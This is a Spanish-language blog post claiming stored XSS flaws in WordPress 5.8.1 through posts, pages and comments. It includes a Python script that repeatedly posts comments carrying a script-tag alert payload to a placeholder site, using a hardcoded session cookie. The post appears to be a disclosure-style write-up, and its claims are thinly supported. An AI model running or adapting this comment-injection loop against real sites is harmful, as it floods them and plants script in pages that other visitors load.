Advertisement

header ads

VULNERABILIDAD XSS STORED - WORDPRESS 5.8.1

 Estuve revisando la versión de wordpress más reciente donde existe muchas vulnerabilidades, donde realice una investigación y aquí venga a mostrarles las vulnerabilidades XSS.

¿Qué es XSS?

Una secuencia de comandos en sitios cruzados o Cross-site scripting es un tipo de vulnerabilidad informática o agujero de seguridad típico de las aplicaciones Web, que puede permitir a una tercera persona inyectar en páginas web visitadas por el usuario código JavaScript o en otro lenguaje similar.

¿Cómo encontrar estas vulnerabilidades?

Aquí tienes un articulo sobre sobre wordpress menciona que lanzará una nueva actualización parchando muchas de  sus vulnerabilidades. ​

Link: https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/

Wordpress: Menciona para diciembre publicar la nueva actualización.

Link: https://patchstack.com/wordpress-security-issues-fixed-5-8-1/

Link: https://codex.wordpress.org/WordPress_Versions

¿Quién reporto estas vulnerabilidades?

Michał Bentkowski reporto algunas vulnerabilidades.
Link: https://twitter.com/SecurityMB/status/1436247108466659334/photo/1

¿Qué tipo de vulnerabilidad son?

Las vulnerabilidades que conozco están en crear un post, pagina y en los comentarios, esto también están constan que los roles.
Ejemplo de un ataque: El atacante puede estar registrado como editor y puede realizar este de vulnerabilidad llenándolo en su base de datos y también en el sitio.

ROLES:


Prueba de concepto:

Versión de wordpress:

Estoy haciendo la prueba de concepto con 5.8.1

NUEVO POST.

También vamos a realizar estas pruebas en un nuevo POST o nuevo articulo.


Esta vulnerabilidad cualquier persona que ingresar al sitio y puede reflejar esta vulnerabilidad.

NUEVA PAGINA:

Esta vulnerabilidad puede afectar también al crear una pagina.


Podemos reflejar otra vez esta vulnerabilidad.
 

Nuevo comentario:

Esta vulnerabilidad se puede reflejar de cualquier usuarios que este autorizado, pero también el tipo de roles de wordpress.
Ejemplo: Si un editor realiza un tipo de comentario puede dejar esta vulnerabilidad reflejándose.


 


Se puede reflejar la vulnerabilidad si un usuario lo autoriza de bajo rol.

¿Qué puede hacer un atacante?

Puede generar la base de datos con esta vulnerabilidad con el siguiente código.

  
  
import requests
from colorama import Fore
import urllib3
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

x = 2
while True:
        url = "https://example.com/wordpress/wp-comments-post.php"
        payload = f"comment={x}%3Cscript%3Ealert%281%29%3C%2Fscrip%3E&submit=Post+Comment&comment_post_ID=1&comment_parent=0&_wp_unfiltered_html_comment=ec631af52a"
        headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Origin': 'https://example.com',
        'DNT': '1',
        'Connection': 'keep-alive',
        'Referer': 'https://example.com/wordpress/?p=1',
        'Cookie': 'wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_d3da788485a4c44d8e6f3d5d923ecd9d=freddy%7C1635229788%7CRsx33pcrz88XSaSBZ15fBp6QDKGkvtMcuymuSZx5TEm%7Cc735b522901f9e9c588ca07c0fc63a778536d6581e8de9531171a8578d96c343; wp-settings-time-2=1635054802',
        'Upgrade-Insecure-Requests': '1',
        'TE': 'Trailers'
        }

        response = requests.request("POST", url, headers=headers, data=payload, allow_redirects=False, verify=False)

        print(Fore.RED + '\n[+]')

        print(response.text)
        print(x)
        x += 1
        time.sleep(2)


Una captura del codigo:

Asi podemos encontrar estas vulnerabilidad que actualmente estan en wordpress y esperemos para diciembre solucione todo. Muchas gracias y no te olvides en compartilo.

Publicar un comentario

0 Comentarios